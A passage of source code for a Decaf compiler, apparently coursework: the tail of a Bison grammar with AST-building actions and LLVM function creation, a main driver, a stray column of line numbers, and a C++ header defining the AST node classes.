        $$ = single;
    }
    ;

/* extern_type: a parameter type; `string` in addition to the ordinary value
   types. */
extern_type: T_STRINGTYPE {
        decafType *strType = new decafType("StringType");
        strType->Ty = stringTy;
        strType->lType = getLLVMType(strType->Ty, Context);
        $$ = strType;
    }
    | type {
        $$ = (decafType *)$1;
    }
    ;

/* method_type: a return type; `void` in addition to the ordinary value
   types. */
method_type: T_VOID {
        decafType *voidType = new decafType("VoidType");
        voidType->Ty = voidTy;
        voidType->lType = getLLVMType(voidType->Ty, Context);
        $$ = voidType;
    }
    | type {
        $$ = (decafType *)$1;
    }
    ;

/* type: the value types `int` and `bool`, each carrying its LLVM type. */
type: T_INTTYPE {
        decafType *intType = new decafType("IntType");
        intType->Ty = intTy;
        intType->lType = getLLVMType(intType->Ty, Context);
        $$ = intType;
    }
    | T_BOOLTYPE {
        decafType *boolType = new decafType("BoolType");
        boolType->Ty = boolTy;
        boolType->lType = getLLVMType(boolType->Ty, Context);
        $$ = boolType;
    }
    ;

/* decafpackage: `package NAME { fields methods }`, or an empty package
   body. */
decafpackage: T_PACKAGE T_ID T_LCB var_declps method_decls T_RCB {
        $$ = new PackageAST(*$2, (decafVarList *)$4, (decafFuncDefList *)$5);
        delete $2;
    }
    | T_PACKAGE T_ID T_LCB T_RCB {
        decafVarList *noFields = new decafVarList();
        decafFuncDefList *noMethods = new decafFuncDefList();
        $$ = new PackageAST(*$2, noFields, noMethods);
        delete $2;
    }
    ;

/* var_declps: zero or more package-level field declarations; the variables
   of each declaration are merged onto the front of the list built for the
   declarations after it. */
var_declps: var_declp var_declps {
        decafVarList *rest = (decafVarList *)$2;
        rest->cat_front((decafVarList *)$1);
        $$ = rest;
    }
    | /* empty */ {
        $$ = new decafVarList();
    }
    ;

/* var_declp: one package-level field declaration. Every declared variable is
   tagged "Scalar" unless it already carries a kind (put_kind only sets an
   empty kind). Forms:
     var a, b type;      several names sharing one type
     var a type = exp;   one name with an initialiser
     var a type;         one name */
var_declp: T_VAR lvalues type T_SEMICOLON {
        decafVarList *vars = (decafVarList *)$2;
        vars->put_types((decafType *)$3);
        vars->put_kinds("Scalar");
        $$ = vars;
    }
    | T_VAR lvalue type T_ASSIGN exp T_SEMICOLON {
        decafVar *var = (decafVar *)$2;
        var->put_kind("Scalar");
        var->put_type((decafType *)$3);
        var->put_exp((decafAllexp *)$5);
        decafVarList *vars = new decafVarList();
        vars->push_front(var);
        $$ = vars;
    }
    | T_VAR lvalue type T_SEMICOLON {
        decafVar *var = (decafVar *)$2;
        var->put_kind("Scalar");
        var->put_type((decafType *)$3);
        decafVarList *vars = new decafVarList();
        vars->push_front(var);
        $$ = vars;
    }
    ;

/* var_decls: zero or more local variable declarations; the variables of each
   declaration are merged onto the front of the list built for the
   declarations after it. */
var_decls: var_decl var_decls {
        decafVarList *rest = (decafVarList *)$2;
        rest->cat_front((decafVarList *)$1);
        $$ = rest;
    }
    | /* empty */ {
        $$ = new decafVarList();
    }
    ;

/* var_decl: one local variable declaration. Same three forms as the
   package-level rule, but no kind tag is applied here. */
var_decl: T_VAR lvalues type T_SEMICOLON {
        decafVarList *vars = (decafVarList *)$2;
        vars->put_types((decafType *)$3);
        $$ = vars;
    }
    | T_VAR lvalue type T_ASSIGN exp T_SEMICOLON {
        decafVar *var = (decafVar *)$2;
        var->put_type((decafType *)$3);
        var->put_exp((decafAllexp *)$5);
        decafVarList *vars = new decafVarList();
        vars->push_front(var);
        $$ = vars;
    }
    | T_VAR lvalue type T_SEMICOLON {
        decafVar *var = (decafVar *)$2;
        var->put_type((decafType *)$3);
        decafVarList *vars = new decafVarList();
        vars->push_front(var);
        $$ = vars;
    }
    ;

/* lvalues: comma-separated variable names. The rule is right-recursive and
   appends at the back, so the resulting list is in reverse source order. */
lvalues: lvalue T_COMMA lvalues {
        decafVarList *rest = (decafVarList *)$3;
        rest->push_back((decafVar *)$1);
        $$ = rest;
    }
    | lvalue {
        decafVarList *single = new decafVarList();
        single->push_back((decafVar *)$1);
        $$ = single;
    }
    ;

/* lvalue: a plain variable name, or `name[exp]`. For the indexed form the
   index expression is stored on the variable and its kind becomes
   "Array(<index text>)". */
lvalue: T_ID {
        $$ = new decafVar(*$1);
        delete $1;
    }
    | T_ID T_LSB exp T_RSB {
        decafVar *var = new decafVar(*$1);
        decafAllexp *index = (decafAllexp *)$3;
        var->put_arr(index);
        var->put_kind("Array(" + index->get_name() + ")");
        delete $1;
        $$ = var;
    }
    ;

/* CONSTANT: any literal token. No other rule in this grammar refers to it. */
CONSTANT : T_INTCONSTANT | T_CHARCONSTANT | T_STRINGCONSTANT { };

/* method_decls: zero or more method definitions, collected front-first so
   the list is in source order. */
method_decls: method_decl method_decls {
        decafFuncDefList *rest = (decafFuncDefList *)$2;
        rest->push_front((decafFuncDef *)$1);
        $$ = rest;
    }
    | /* empty */ {
        $$ = new decafFuncDefList();
    }
    ;

/* method_decl: `func NAME(params) rettype { ... }`
   Builds the AST node and, the first time NAME is seen, creates the
   llvm::Function and records it in the symbol table as a function; the body
   is generated later by decafFuncDef::Codegen.
   When NAME is already registered the new descriptor is freed (it used to be
   leaked) and no second llvm::Function is created. */
method_decl: T_FUNC T_ID T_LPAREN para_list_def T_RPAREN method_type block {
        decafFuncDef *func = new decafFuncDef();
        func->put_name($2);
        func->put_type((decafType *)$6);
        func->put_para((decafPara *)$4);
        func->put_block((decafBlock *)$7);
        $$ = func;
        delete $2;

        descriptor* des = new descriptor();
        if (put_symbol(func->get_name(), des)) {
            llvm::Type *returnTy = func->lType;
            std::vector<llvm::Type *> functionArgs;
            for (auto p : func->get_para()->get_para()) {
                functionArgs.push_back(p->lType);
            }

            func->lfunc = llvm::Function::Create(
                llvm::FunctionType::get(returnTy, functionArgs, false),
                llvm::Function::ExternalLinkage,
                func->get_name(),
                TheModule);
            if (func->lfunc == 0) {
                throw runtime_error("empty function block");
            }

            des->func = func->lfunc;
            des->kind = funcK;
        }
        else {
            /* put_symbol did not store the descriptor, so it is still ours. */
            delete des;
        }
    }
    ;

/* blockt: a nested `{ decls stmts }` block (labelled "Block"), or `{}`. */
blockt: T_LCB var_decls statements T_RCB {
        $$ = new decafBlock("Block", (decafVarList *)$2, (decafStmts *)$3);
    }
    | T_LCB T_RCB {
        decafVarList *noVars = new decafVarList();
        decafStmts *noStmts = new decafStmts();
        $$ = new decafBlock("Block", noVars, noStmts);
    }
    ;

/* block: a method body `{ decls stmts }` (labelled "MethodBlock"), or `{}`. */
block: T_LCB var_decls statements T_RCB {
        $$ = new decafBlock("MethodBlock", (decafVarList *)$2, (decafStmts *)$3);
    }
    | T_LCB T_RCB {
        decafVarList *noVars = new decafVarList();
        decafStmts *noStmts = new decafStmts();
        $$ = new decafBlock("MethodBlock", noVars, noStmts);
    }
    ;

/* statements: zero or more statements, collected front-first so the list is
   in source order. */
statements: statement statements {
        decafStmts *rest = (decafStmts *)$2;
        rest->push_front((decafStmt *)$1);
        $$ = rest;
    }
    | /* empty */ {
        $$ = new decafStmts();
    }
    ;

/* statement: any single statement. Every alternative forwards the node built
   by the sub-rule; assignments, calls, return, break and continue are
   terminated by a semicolon, blocks and control-flow statements are not. */
statement: blockt { $$ = $1; }
| assign T_SEMICOLON { $$ = $1; }
| method_call T_SEMICOLON { $$ = $1; }
| state_return T_SEMICOLON { $$ = $1; }
| state_if { $$ = $1; }
| state_while { $$ = $1; }
| state_for { $$ = $1; }
| state_break T_SEMICOLON { $$ = $1; }
| state_continue T_SEMICOLON { $$ = $1; }
;

/* state_if: `if (exp) block [else block]`; a missing else branch is passed
   as NULL. */
state_if: T_IF T_LPAREN exp T_RPAREN blockt T_ELSE blockt {
        $$ = new decafIF((decafAllexp *)$3, (decafBlock *)$5, (decafBlock *)$7);
    }
    | T_IF T_LPAREN exp T_RPAREN blockt {
        $$ = new decafIF((decafAllexp *)$3, (decafBlock *)$5, NULL);
    }
    ;

/* state_while: `while (exp) block`. */
state_while: T_WHILE T_LPAREN exp T_RPAREN blockt {
        $$ = new decafWhile((decafAllexp *)$3, (decafBlock *)$5);
    }
    ;

/* state_for: `for (assigns; exp; assigns) block`. The node receives the
   condition, the body, the first assignment list and the second assignment
   list, in that order. */
state_for: T_FOR T_LPAREN assignss T_SEMICOLON exp T_SEMICOLON assignss T_RPAREN blockt {
        decafAssignList *first = (decafAssignList *)$3;
        decafAssignList *second = (decafAssignList *)$7;
        $$ = new decafFor((decafAllexp *)$5, (decafBlock *)$9, first, second);
    }
    ;

/* state_break: `break`, represented by an output-only node. */
state_break: T_BREAK {
        $$ = new decafOutput("BreakStmt");
    }
    ;

/* state_continue: `continue`, represented by an output-only node. */
state_continue: T_CONTINUE {
        $$ = new decafOutput("ContinueStmt");
    }
    ;

/* state_return: `return (exp)`, `return ()` or bare `return`; the two forms
   without a value carry a NULL expression. */
state_return: T_RETURN T_LPAREN exp T_RPAREN {
        $$ = new decafReturn((decafBinexp *)$3);
    }
    | T_RETURN T_LPAREN T_RPAREN {
        $$ = new decafReturn(NULL);
    }
    | T_RETURN {
        $$ = new decafReturn(NULL);
    }
    ;

/* assignss: a possibly empty assignment list. */
assignss : assigns { $$ = $1; }
    | /* empty */ { $$ = new decafAssignList(); }
    ;

/* assigns: one or more comma-separated assignments, collected front-first so
   the list is in source order. */
assigns: assign T_COMMA assigns {
        decafAssignList *rest = (decafAssignList *)$3;
        rest->push_front((decafAssign *)$1);
        $$ = rest;
    }
    | assign {
        decafAssignList *single = new decafAssignList();
        single->push_front((decafAssign *)$1);
        $$ = single;
    }
    ;

/* assign: `lvalue = exp`. The assignment node copies the target's name and
   array index expression and is tagged as an assignment statement. */
assign: lvalue T_ASSIGN exp {
        decafVar *target = (decafVar *)$1;
        decafAssign *node = new decafAssign(target->get_name(), (decafBinexp *)$3);
        node->kind = dass;
        node->put_arr(target->get_arr());
        $$ = node;
    }
    ;

/* exp: expressions. Unary and binary operators build decafUnaryexp /
   decafBinexp nodes labelled with the operator name; leaves build
   decafAllexp nodes labelled with their kind; a method call is forwarded
   unchanged.
   Token strings are released once copied into the node. The character and
   string constant alternatives now do this too; they used to leak the token
   string, unlike the identifier and integer alternatives.
   NOTE(review): this assumes the lexer heap-allocates every <sval> token the
   same way - confirm against the lexer. */
exp : T_NOT exp {
        $$ = new decafUnaryexp("Not", (decafBinexp*)$2);
    }
    | T_MINUS exp %prec T_UMINUS {
        $$ = new decafUnaryexp("UnaryMinus", (decafBinexp*)$2);
    }
    | exp T_PLUS exp {
        $$ = new decafBinexp("Plus", (decafBinexp*)$1, (decafBinexp*)$3);
    }
    | exp T_MINUS exp {
        $$ = new decafBinexp("Minus", (decafBinexp*)$1, (decafBinexp*)$3);
    }
    | exp T_MULT exp {
        $$ = new decafBinexp("Mult", (decafBinexp*)$1, (decafBinexp*)$3);
    }
    | exp T_DIV exp {
        $$ = new decafBinexp("Div", (decafBinexp*)$1, (decafBinexp*)$3);
    }
    | exp T_MOD exp {
        $$ = new decafBinexp("Mod", (decafBinexp*)$1, (decafBinexp*)$3);
    }
    | exp T_LEFTSHIFT exp {
        $$ = new decafBinexp("Leftshift", (decafBinexp*)$1, (decafBinexp*)$3);
    }
    | exp T_RIGHTSHIFT exp {
        $$ = new decafBinexp("Rightshift", (decafBinexp*)$1, (decafBinexp*)$3);
    }
    | exp T_LEQ exp {
        $$ = new decafBinexp("Leq", (decafBinexp*)$1, (decafBinexp*)$3);
    }
    | exp T_GEQ exp {
        $$ = new decafBinexp("Geq", (decafBinexp*)$1, (decafBinexp*)$3);
    }
    | exp T_LT exp {
        $$ = new decafBinexp("Lt", (decafBinexp*)$1, (decafBinexp*)$3);
    }
    | exp T_GT exp {
        $$ = new decafBinexp("Gt", (decafBinexp*)$1, (decafBinexp*)$3);
    }
    | exp T_EQ exp {
        $$ = new decafBinexp("Eq", (decafBinexp*)$1, (decafBinexp*)$3);
    }
    | exp T_NEQ exp {
        $$ = new decafBinexp("Neq", (decafBinexp*)$1, (decafBinexp*)$3);
    }
    | exp T_AND exp {
        $$ = new decafBinexp("And", (decafBinexp*)$1, (decafBinexp*)$3);
    }
    | exp T_OR exp {
        $$ = new decafBinexp("Or", (decafBinexp*)$1, (decafBinexp*)$3);
    }
    | T_LPAREN exp T_RPAREN { $$ = $2; }
    | T_ID {
        $$ = new decafAllexp(*$1, "VariableExpr");
        delete $1;
    }
    | T_ID T_LSB exp T_RSB {
        $$ = new decafArrexp(*$1, (decafAllexp *)$3);
        delete $1;
    }
    | T_INTCONSTANT {
        $$ = new decafAllexp(*$1, "NumberExpr");
        delete $1;
    }
    | T_CHARCONSTANT {
        /* A character constant is treated as a number. */
        $$ = new decafAllexp(*$1, "NumberExpr");
        delete $1;
    }
    | T_STRINGCONSTANT {
        $$ = new decafAllexp(*$1, "StringConstant");
        delete $1;
    }
    | T_TRUE {
        $$ = new decafAllexp("True", "BoolExpr");
    }
    | T_FALSE {
        $$ = new decafAllexp("False", "BoolExpr");
    }
    | method_call { $$ = $1; }
    ;

/* method_call: `NAME(args)`. The call node copies the callee name and the
   argument list. */
method_call: T_ID T_LPAREN para_list_use T_RPAREN {
        decafStmtList *args = (decafStmtList *)$3;
        decafFunCall *node = new decafFunCall();
        node->put_name($1);
        node->put_para(args->get_para());
        delete $1;
        $$ = node;
    }
    ;

%%

// Compiler driver: create the LLVM module, parse the input (the grammar
// actions build the AST and generate code into the module), then print the
// module's IR to stderr.
// Exit status is EXIT_FAILURE when yyparse reports an error (>= 1),
// EXIT_SUCCESS otherwise.
int main() {
    // The module holds all generated code.
    TheModule = new llvm::Module("Test", Context);
    TheModule->setSourceFileName(llvm::StringRef("DecafExpr"));

    const int status = yyparse();

    // The IR is printed whether or not parsing succeeded.
    TheModule->print(llvm::errs(), nullptr);
    return status >= 1 ? EXIT_FAILURE : EXIT_SUCCESS;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
#include "default-defs.h"
#include <list>
#include <ostream>
#include <iostream>
#include <sstream>
#include <map>
#include <regex>

#ifndef YYTOKENTYPE
#include "decafexpr.tab.h"
#endif

using namespace std;
extern llvm::Module *TheModule;

// descriptor - the record stored for a name in the symbol tables and carried
// by every AST node.
class descriptor {
public:
// Anonymous union: the four pointers share one storage location, so writing
// one member and reading another yields the same address. The code generator
// sets `alloc` together with kind valueK and `func` together with kind funcK.
union
{
llvm::AllocaInst * alloc;
llvm::Function* func;
llvm::Value* value;
llvm::Type* type;
};
// Tag describing what the descriptor stands for (e.g. valueK, funcK, nullK).
llvmValue kind;
};

// decafAST - Base class for all abstract syntax tree nodes.
// Each node carries a descriptor, initialised to a null value with kind
// nullK. Codegen here is not virtual: the base version just hands back the
// value stored in the descriptor.
class decafAST {
public:
    descriptor des = {0,nullK};

    virtual ~decafAST() {}

    // Textual form of the node; empty for the base class.
    virtual string str() { return string(); }

    llvm::Value *Codegen() { return des.value; }
};

// Map a Decaf type tag to the LLVM type used for it:
//   voidTy -> void, intTy -> i32, boolTy -> i1, stringTy -> i8*.
// Throws runtime_error("unknown type") for any other tag.
llvm::Type *getLLVMType(llvmType ty, llvm::LLVMContext &Context ) {
    if (ty == voidTy) {
        return llvm::Type::getVoidTy(Context);
    }
    if (ty == intTy) {
        return llvm::Type::getInt32Ty(Context);
    }
    if (ty == boolTy) {
        return llvm::Type::getInt1Ty(Context);
    }
    if (ty == stringTy) {
        return llvm::Type::getInt8PtrTy(Context);
    }
    throw runtime_error("unknown type");
}

// Run Codegen on every element of `vec` in order and return the last
// non-NULL result (NULL when no element produced a value).
template <class T>
llvm::Value *listCodegen(list<T> vec) {
    llvm::Value *last = NULL;
    for (auto &node : vec) {
        llvm::Value *produced = node->Codegen();
        if (produced != NULL) {
            last = produced;
        }
    }
    return last;
}

// Textual form of an optional node: the node's str(), or "None" for a NULL
// pointer.
string getString(decafAST *d) {
    return (d == NULL) ? string("None") : d->str();
}

// Join the str() of every element of `vec` with commas. A comma is inserted
// only when the text accumulated so far is non-empty, and an empty overall
// result is reported as "None".
template <class T>
string commaList(list<T> vec) {
    string joined;
    for (auto &item : vec) {
        if (!joined.empty()) {
            joined += string(",");
        }
        joined += item->str();
    }
    return joined.empty() ? string("None") : joined;
}

// decafStmtList - List of Decaf statements
class decafStmtList : public decafAST {
list<decafAST *> stmts;
public:
decafStmtList() {}
~decafStmtList() {
for (list<decafAST *>::iterator i = stmts.begin(); i != stmts.end(); i++) {
delete *i;
}
}
int size() { return stmts.size(); }
void push_front(decafAST *e) { stmts.push_front(e); }
void push_back(decafAST *e) { stmts.push_back(e); }
list<decafAST *> get_para(){return stmts; }
string str() { return commaList<class decafAST *>(stmts); }
llvm::Value * Codegen() {
return listCodegen<decafAST *>(stmts);
}
};

// decafAllexp - leaf expression: a variable reference, a number, a boolean or
// a string constant. Kind names the flavour ("VariableExpr", "NumberExpr",
// "BoolExpr", "StringConstant"); Name holds the normalised text.
//
// Normalisation done by the constructor:
//   NumberExpr     - a quoted escape such as '\n' becomes the decimal code of
//                    the escaped character; a one-character text c becomes
//                    the decimal form of c - 48; a three-character text that
//                    starts with a quote becomes the decimal code of its
//                    middle character; anything else is kept as written.
//   StringConstant - the first and last characters (the surrounding quotes)
//                    are removed and backslash escapes are replaced by the
//                    characters they denote. An unknown escape yields a NUL
//                    character; a trailing lone backslash is dropped.
//
// Changes relative to the previous version: the escape table is built once
// instead of per node, the escape key is assembled with std::string instead
// of sprintf into a fixed buffer, and a string literal shorter than its two
// quotes no longer calls pop_back() on an empty string.
class decafAllexp : public decafAST {
    string Kind;
    string Name;
public:
    string get_name(){return this->Name; }
    string get_kind(){return this->Kind; }
    decafAllexp(){}
    decafAllexp(string name,string kind) : Kind(kind), Name(name) {
        this->des.kind = valueK;

        // Quoted escape sequence -> character code.
        static const map<string,int> tab = {
            {"'\\t'",'\t'},
            {"'\\r'",'\r'},
            {"'\\n'",'\n'},
            {"'\\a'",'\a'},
            {"'\\v'",'\v'},
            {"'\\b'",'\b'},
            {"'\\f'",'\f'},
            {"'\\\\'",'\\'},
            {"'\\\''",'\''},
            {"'\\\"'",'\"'},
        };

        if (kind == "NumberExpr") {
            map<string,int>::const_iterator esc = tab.find(this->Name);
            if (esc != tab.end()) {
                this->Name = to_string(esc->second);
            }
            else if (this->Name.size() == 1) {
                this->Name = to_string(this->Name[0] - 48);
            }
            else if (this->Name.size() == 3 && (this->Name[0] == '\'' || this->Name[0] == '\"')) {
                this->Name = to_string(this->Name[1]);
            }
        }

        if (kind == "StringConstant") {
            // Strip the surrounding quotes, tolerating a malformed literal.
            string raw = this->Name;
            if (!raw.empty()) { raw.erase(0, 1); }
            if (!raw.empty()) { raw.pop_back(); }

            string text;
            text.reserve(raw.size());
            for (size_t i = 0; i < raw.size(); i++) {
                if (raw[i] != '\\') {
                    text.push_back(raw[i]);
                    continue;
                }
                if (i + 1 >= raw.size()) {
                    break;  // trailing backslash: nothing to escape
                }
                string key = string("'\\") + raw[i + 1] + "'";
                map<string,int>::const_iterator esc = tab.find(key);
                text.push_back(esc != tab.end() ? (char)esc->second : '\0');
                i++;  // the escaped character has been consumed
            }
            this->Name = text;
        }
    }
    string str() { return Kind + "(" + Name + ")"; }
    llvm::Value *Codegen();
};

class decafArrexp : public decafAllexp {
string Name;
decafAllexp * Exp;
public:
decafArrexp(string Name, decafAllexp *Exp)
: Name(Name), Exp(Exp) {}
string str() { return string("ArrayLocExpr") + "(" + Name + "," + getString(Exp) + ")"; }
};

// decafBinexp - binary expression: operator name plus two operands. The
// three-argument constructor tags the node as expbK so that Codegen treats it
// as a binary operation.
class decafBinexp : public decafAllexp {
public:
    string Option;
    decafBinexp * Exp1;
    decafBinexp * Exp2;

    decafBinexp() {}
    decafBinexp(string op, decafBinexp *exp1, decafBinexp *exp2)
        : Option(op), Exp1(exp1), Exp2(exp2)
    {
        this->des.kind = expbK;
    }

    // Translate an operator name into its numeric code.
    virtual int get_op(string Option);

    string str() {
        return string("BinaryExpr") + "(" + Option + "," + getString(Exp1) + "," + getString(Exp2) + ")";
    }
    llvm::Value *Codegen();
};

// Translate an operator name as produced by the grammar ("Plus", "Not", ...)
// into the operator code switched on during code generation.
// Unknown names map to 0.
int decafBinexp::get_op(string Option){
    static const map<string,int> codes = {
        {"Plus",       addtmp},
        {"Minus",      subtmp},
        {"Mult",       multmp},
        {"UnaryMinus", negtmp},
        {"Div",        divtmp},
        {"Mod",        remtmp},
        {"Or",         ortmp},
        {"And",        andtmp},
        {"Eq",         eqtmp},
        {"Neq",        netmp},
        {"Not",        nottmp},
        {"Lt",         slttmp},
        {"Gt",         sgttmp},
        {"Leq",        sletmp},
        {"Geq",        sgetmp},
        {"Leftshift",  shltmp},
        {"Rightshift", shrtmp},
    };
    map<string,int>::const_iterator hit = codes.find(Option);
    return hit == codes.end() ? 0 : hit->second;
}

// decafUnaryexp - unary expression. It reuses decafBinexp's fields with only
// the first operand set (Exp2 is NULL) and tags the node as expuK.
class decafUnaryexp : public decafBinexp {
public:
    decafUnaryexp() {}
    decafUnaryexp(string op, decafBinexp *exp1) {
        this->Option = op;
        this->Exp1 = exp1;
        this->Exp2 = NULL;
        this->des.kind = expuK;
    }

    string str() {
        return string("UnaryExpr") + "(" + Option + "," + getString(Exp1) + ")";
    }
};

// decafType - a type annotation, optionally carrying the name of the
// parameter it belongs to. lType and Ty are filled in by the grammar actions
// after construction.
class decafType : public decafAST {
    string Type;
    string Name;
public:
    llvm::Type* lType;
    llvmType Ty;

    decafType(string Type) : Type(Type) {}

    string get_type() { return this->Type; }
    string get_name() { return this->Name; }
    void put_name(string Name) { this->Name = Name; }

    // "VarDef(name,type)" for a named parameter, "VarDef(type)" otherwise.
    string str() {
        if (Name == "") {
            return "VarDef("+Type+")";
        }
        return "VarDef("+Name+","+Type+")";
    }
    llvm::Value *Codegen();
};

// decafVar - a declared variable (package field or local) or an assignment
// target.
//
// Exp is the optional initialiser, Arr the optional array index expression,
// Alloca the stack slot created by Codegen and lType the LLVM type set by
// put_type. All four now start out as NULL: they used to be left
// uninitialised, although str() tests Exp against NULL and the grammar
// forwards get_arr() for plain (non-array) variables.
class decafVar : public decafAST {
    string Type;
    string Name;
    string Kind;
    decafAllexp* Exp;
    decafAllexp* Arr;
public:
    llvm::AllocaInst *Alloca;
    llvm::Type* lType;
    decafVar(string Name)
        : Name(Name), Exp(NULL), Arr(NULL), Alloca(NULL), lType(NULL) {}
    string get_type(){return this->Type;}
    string get_name(){return this->Name;}
    string get_kind(){return this->Kind;}
    decafAllexp* get_arr(){return this->Arr;}
    decafAllexp* get_exp(){return this->Exp;}
    // Copy both the printable type name and the LLVM type from `type`.
    void put_type(decafType* type){
        this->Type = type->get_type();
        this->lType = type->lType;
    }
    void put_name(string Name){this->Name = Name;}
    // The kind is only set once: a later call does not overwrite it.
    void put_kind(string Kind){
        if(this->Kind == "")
            this->Kind = Kind;
    }
    void put_arr(decafAllexp* Arr){this->Arr = Arr;}
    void put_exp(decafAllexp* Exp){this->Exp = Exp;}
    // Printed form, by priority: initialised variable, field with a kind,
    // named definition, bare type.
    string str() {
        if(Exp != NULL){
            return "AssignGlobalVar("+Name+","+Type+","+getString(Exp)+")";
        }
        else if(Kind != "" && Name != ""){
            return "FieldDecl("+Name+","+Type+","+Kind+")";
        }
        else if(Name != ""){
            return "VarDef("+Name+","+Type+")";
        }
        else{
            return "VarDef("+Type+")";
        }
    }
    llvm::Value *Codegen();
};

class decafVarList : public decafAST {
list<decafVar*> List;
public:
list<decafVar*> get_list(){return this->List; }
int size() { return List.size(); }
void push_front(decafVar *e) { List.push_front(e); }
void push_back(decafVar *e) { List.push_back(e); }
void cat_front(decafVarList* List) {
list<decafVar*> l = List->get_list();
for(auto e:l){
this->List.push_front(e);
}
}
void put_types(decafType* Type){
for(auto e:this->List){
e->put_type(Type);
}
}
void put_kinds(string Kind){
for(auto e:this->List){
e->put_kind(Kind);
}
}
string str() {return commaList<class decafVar *>(List);}
llvm::Value * Codegen() {
return listCodegen<decafVar *>(List);
}
};

// decafOutput - node that only carries a fixed piece of text, which str()
// returns verbatim.
class decafOutput : public decafAST {
    string Data;
public:
    decafOutput(string Data) : Data(Data) {}
    string str() { return Data; }
};

// decafPara - parameter list of a function declaration or definition.
class decafPara : public decafAST {
    list<decafType *> Para;
public:
    int size() { return Para.size(); }
    void push_front(decafType *e) { Para.push_front(e); }
    void push_back(decafType *e) { Para.push_back(e); }

    // Returns a copy of the underlying list.
    list<decafType *> get_para() { return Para; }

    string str() { return commaList<class decafType *>(Para); }
    llvm::Value *Codegen();
};

// decafStmt - base class of statements. `kind` is the tag that
// decafStmt::Codegen switches on to reach the concrete statement class; it is
// set by the derived class or by the grammar action.
class decafStmt : public decafAST {
public:
    llvmStmt kind;

    decafStmt() {}

    llvm::Value * Codegen();
};

// decafStmts - sequence of statements inside a block.
class decafStmts : public decafAST {
    list<decafStmt *> stmts;
public:
    decafStmts() {}

    int size() { return stmts.size(); }
    void push_front(decafStmt *e) { stmts.push_front(e); }
    void push_back(decafStmt *e) { stmts.push_back(e); }

    // Returns a copy of the underlying list.
    list<decafStmt *> get_para() { return stmts; }

    string str() { return commaList<class decafStmt *>(stmts); }

    // Generates every statement in order; yields the last non-NULL result.
    llvm::Value * Codegen() {
        return listCodegen<decafStmt *>(stmts);
    }
};

// decafFunCall - method call, usable both as a statement (kind dcall) and as
// an expression (descriptor kind funcK).
class decafFunCall : public decafStmt {
    string Name;
    list<decafAST *> Para;
public:
    decafFunCall() {
        this->kind = dcall;
        this->des.kind = funcK;
    }

    void put_para(list<decafAST *> Para) { this->Para = Para; }
    // Copies the string pointed to; the caller keeps ownership of it.
    void put_name(string *Name) { this->Name = *Name; }

    int size() { return Para.size(); }
    string get_name() { return this->Name; }
    // Returns a copy of the argument list.
    list<decafAST *> get_para() { return this->Para; }

    string str() {
        string args = commaList<class decafAST *>(Para);
        return string("MethodCall") + "(" + Name + "," + args + ")";
    }
    llvm::Value *Codegen();
};

// decafAssign - assignment statement `Var = Exp`, or `Var[Arr] = Exp` when an
// array index expression has been attached with put_arr.
//
// key and Arr are now initialised by the constructor (false / NULL). They
// used to be left uninitialised, while str() chooses its output form by
// testing Arr against NULL.
class decafAssign : public decafStmt {
    string Var;
    bool key;
    decafAllexp* Arr;
    decafBinexp* Exp;
public:
    void put_arr(decafAllexp* Arr){this->Arr = Arr;}
    void put_key(bool key){this->key = key;}
    string get_var(){ return this->Var; }
    decafBinexp* get_exp(){ return this->Exp; }
    decafAssign(string Var, decafBinexp* Exp)
        : Var(Var), key(false), Arr(NULL), Exp(Exp) {}
    // "AssignVar(var,exp)" for a plain target,
    // "AssignArrayLoc(var,index,exp)" for an indexed one.
    string str() {
        if(Arr == NULL)
            return string("AssignVar") + "(" + Var + "," + getString(Exp) + ")";
        else
            return string("AssignArrayLoc") + "(" + Var + "," + getString(Arr)+","+ getString(Exp) + ")";
    }
    llvm::Value *Codegen();
};

class decafAssignList : public decafAST {
list<decafAssign *>List;
public:
int size() { return List.size(); }
void push_front(decafAssign *e) { List.push_front(e); }
void push_back(decafAssign *e) { List.push_back(e); }
void put_keys(bool key){
for(auto ass:List){
ass->put_key(key);
}
}
string str() {
return commaList<class decafAssign *>(List);
}
llvm::Value *Codegen() {
return listCodegen<decafAssign *>(List);
}
};

